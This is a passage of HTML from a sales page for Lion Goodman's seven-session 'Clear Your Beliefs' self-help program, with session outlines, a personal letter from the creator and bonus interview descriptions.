need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and 